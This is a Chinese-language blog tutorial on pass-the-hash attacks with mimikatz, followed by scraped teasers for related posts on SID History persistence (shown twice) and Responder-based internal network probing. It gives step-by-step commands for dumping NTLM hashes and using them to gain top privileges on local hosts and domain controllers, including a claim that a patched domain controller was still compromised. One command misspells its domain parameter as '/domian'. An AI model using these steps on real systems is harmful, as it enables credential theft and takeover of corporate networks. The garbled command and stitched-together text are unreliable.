1.被pth攻擊的計算機未打補丁(kb2871997)
2.拿到一台域成員主機並且拿到管理員組的域使用者的ntml
3.對方主機存在相同賬號並且是管理員組成員
本地使用者利用pth攻擊的條件
預設設定為0。如果設定為1,則sid為500的管理員也不能通過網路登入的方式獲取高許可權。
開打mimikatz輸入
log 後續輸出列印日誌
privilege::debug 提公升許可權
sekurlsa::msv 抓取hash
讓後pth 攻擊
sekurlsa::pth /domian:要攻擊的ip /user: 相同的使用者名稱 /ntlm: ntlm雜湊
彈出乙個cmd 視窗 直接輸入
可以看到c盤
在看看執行計畫
能看到這個可以證明你擁有最高許可權了
這是以本地使用者進行的pth攻擊
依舊如此只是在 domian 換成域控名字
sekurlsa::pth /domain:域控名 /user: 相同的使用者名稱 /ntlm: ntlm雜湊
獲得了最高許可權
疑惑的是我的域控已經打了補丁(kb2871997)
然而依舊獲取了最高許可權
這是補丁的原理
安裝kb2871997補丁後,其他方面並沒有太多的變化。補丁會給本地賬號新增乙個 s-1-5-113 的sid,為管理組中的本地賬號新增乙個s-1-5-114的sid,這樣方便通過域策略進行管理,例如從域策略中全面禁止這類賬號的網路登入
is-dead-long-live-localaccounttokenfilterpolicy/
blocking-remote-use-of-local-accounts/#comment-2525
許可權維持之 SID History 域控許可權維持
目錄 每個使用者都有自己的sid,sid的作用主要是跟蹤安全主體控制使用者連線資源時的訪問許可權,sid history是在域遷移過程中需要使用的乙個屬性。如果a域中的域使用者遷移到b域中,那麼該使用者的sid值就會改變,進而其許可權也會改變。導致遷移後的使用者無法訪問以前可以訪問的資源。sid h...
許可權維持之 SID History 域控許可權維持
目錄 每個使用者都有自己的sid,sid的作用主要是跟蹤安全主體控制使用者連線資源時的訪問許可權,sid history是在域遷移過程中需要使用的乙個屬性。如果a域中的域使用者遷移到b域中,那麼該使用者的sid值就會改變,進而其許可權也會改變。導致遷移後的使用者無法訪問以前可以訪問的資源。sid h...
Responder探測內網獲取域控許可權總結
responder探測內網獲取域控許可權總結 1 執行responder探測內網 responder.py i eth0 rpv 2 獲取172.16.157.133的responder值 3 使用crack map exec檢查此主機的netbios資訊 cme smb 172.16.157.13...